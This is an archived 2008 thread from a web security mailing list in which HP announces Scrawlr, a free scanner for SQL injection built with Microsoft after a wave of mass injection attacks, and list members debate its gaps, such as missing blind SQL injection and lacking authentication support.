[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

Billy, as I said I tested it on a blind sql injection that's why it didn't get caught. If you still want the logs just ask but I'm sure they're useless since bsqli is just not supported atm. I was just pointin out that while the bot could have been successful at exploiting that (blind) injection, same cannot be said for the tool. (I'm still talking about an injection through GET method).
Blind sqli is not so uncommon. Many website (and hosting companies for their customers) use a user-friendly page for Internal server error or just play security by obscurity.
I'm sure with not so big efforts you can add this feature.

----
Zinho

Webmaster and Founder

Hackers Center
Internet Security Portal
www.hackerscenter.com



Hoffman, Billy ha scritto: 
Can you give us some more info on your testing problems? Can we get access to the troublesome pages? I hear you on the "if your going to make a splash make it a good one" point and I agree with you. I truly want to improve this with additional features and bug fixes. There is only so much I can do now that SPI is part of a corporate machine...

Please let me know if we can access the pages or send us the files themselves and we will test them in house. At the very least can you send us a proxy log of the tool crawling/attacking the pages?

Thanks,

Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069


-----Original Message-----
From: Zinho [mailto:zinho@xxxxxxxxxxxxxxxxx]
Sent: Wednesday, June 25, 2008 3:38 AM
To: Hoffman, Billy; websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

Billy and Rafal,
I do really appreciate that Microsoft cared for a security threat that
didn't even come from a vulnerability into their software but from poor
coding using their legacy (poor?) script languages.
And I got that this wasn't a penetration testing tool.
My point was, if it doesn't crawl all the links in a page (from the tool
GUI I read "is limited in the number of links it will crawl"), and is
not able to recognize a blind sqli isn't this effort at least half-wasted?
AFAIK, the attack tool just tried to inject the payload in a dynamic
parameter of the querystring found through google.
So it would have been successful against a bsqli while the tool is not.
The effort is interesting, but some basic improvements would have made
it more useful for future vectors too.

And Rafal, I tested the tool pointing it to an .htm page where there's a
link to the vulnerable asp page with the vulnerable querystring.

----
Zinho

Webmaster and Founder

Hackers Center
Internet Security Portal
www.hackerscenter.com



Hoffman, Billy ha scritto:
Michael, Zinho,

I'm not sure why people seem to think Scrawlr is a replacement for existing tools like Absinthe or Nikto or Burp, etc. Its not and I'm sorry if you got that impression.

Scrawlr exists for one reason: Some crazy hackers who read Chinese built this:
http://isc.sans.org/diary.html?storyid=4294

Microsoft came to us for that specific need. To help them provide developers with tools to prevent these mass exploits. Because the attack tool leverages search engines to find target pages Scrawlr crawls and behaves like an indexing spider. It then SQL injection all query parameters exactly like the attack tool. We then extract all the user tables (be it Oracle, MSSQL, Mysql >=5, etc) to confirm SQL injection before flagging it. I'm very happy with our results.

Is the tool going to find issues behind auth or forms or other web components? No, but neither will the attackers using this mass exploit tool. Can they change tactics and use, for example, Nikto or Burp? Sure.

Could we have released Scrawlr as more of a WI Lite? Yes, but that was never its intent. And if you need something that's more robust by all means grab a free trial of WI or another vendor, or Burp, or Nikto or script some w3af.

Zinho, if you are finding bugs I'd love to learn more about them and get them fixed. Scrawlr supports proxies so that will help you see what is going on. Did the vuln page get crawled?

At the end of the day it's a free tool folks designed to solve a certain issue. I'm certainly open to more feedback but let's keep its original goals in perspective.

Thanks,
Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069


-----Original Message-----
From: Zinho [mailto:zinho@xxxxxxxxxxxxxxxxx]
Sent: Tuesday, June 24, 2008 8:04 PM
To: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

I have to agree with  Michael. I tested it on both simple ASP and PHP
pages with a clear sql injection. Nothing. The tool doesn't even seem to
check for blind sqli.
I think it merely gets the server's response and looks for known SQL
errors. Not mentioning the limited crawling capabilities.
I would have expected something more from HP/MS. Free tools around do a
much better job.

http://www.hackerscenter.com/index.php?/Blogs/2819-HP-and-MS-give-us-a-new-SQL-Injection-tool.html


----
Armando Romeo

Webmaster and Founder

Hackers Center
Internet Security Portal
www.hackerscenter.com



Michael S. Menefee ha scritto:

Billy,

Although this is indeed a good step, there are already a plethora of
"free" sql injection scanners or exploiters that kick the crap out of
this tool.

However, I am extremely excited to see this kind of development in the
commercial space, and would like to see some enhancements to this
product. Now, if HPs goal is to push their commercial tools ($$$) by
pushing a limited "free" version, then I suppose none of this will ever
happen, but *at a minimum* it would be nice to be able to either modify
headers or input credentials where public sites are not the target.

I tested this on 3 sites I knew to be vulnerable to SQL injection (all
ASP.NET, MSSQL), but either cookies or authentication were required to
actually test in these case, hence nothing was discovered with this
tool(lame).

There's nothing worse than a free version of a product designed
exclusively for you to be left "wanting" and thinking about purchasing
the commercial version.

If there are unseen or hidden options to this tool, forgive me,
otherwise I don't really see the value when so many better free tools
exist (Pangolin, Absinthe, Magic, Power Injector, etc, etc, etc)








-----Original Message-----
From: Hoffman, Billy [mailto:billy.hoffman@xxxxxx]
Sent: Tuesday, June 24, 2008 5:35 PM
To: websecurity@xxxxxxxxxxxxx
Subject: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

In response to all the Mass SQL Injection attacks this year, Microsoft
approached HP and the Web Security Research Group (formerly SPI Labs)
for assistance. While there was nothing they could patch, Microsoft
wanted to provide tools to help developers find and fix these issues.
After a month of development HP created Scrawlr.

Scrawlr (short for SQL Injector and Crawler) is a free tool that will
crawl a website while simultaneously analyzing the parameters of each
individual web page for SQL Injection vulnerabilities. Scrawlr was
designed specifically to help protect against these mass injection
attack which are using Google queries to find older web applications and
automatically injection them.  As such, Scrawlr crawls a websites using
the same techniques as a search engine: it doesn't keep state, or submit
forms, or execute JavaScript or Flash. This Scrawl is finding and
auditing the pages that would have been indexed by the search engines.

To reduce false positives Scrawlr provides proof of the vulnerability
results by displaying the type of backend database in use and a list of
available table names. There is no denying you have SQL Injection when I
can show you table names!

Microsoft Announcement here:
http://www.microsoft.com/technet/security/advisory/954462.mspx
HP WSRG Blog:
http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/200
8/06/23/finding-sql-injection-with-scrawlr.aspx
Download here: https://download.spidynamics.com/Products/scrawlr/

Enjoy,
Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069


------------------------------------------------------------------------
----
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA





----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA





--
----
Zinho

Webmaster and Founder

Hackers Center
Internet Security Portal
www.hackerscenter.com




--
----
Zinho

Webmaster and Founder

Hackers Center Internet Security Portal
www.hackerscenter.com


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

Brought to you by http://www.webappsec.org
Search this site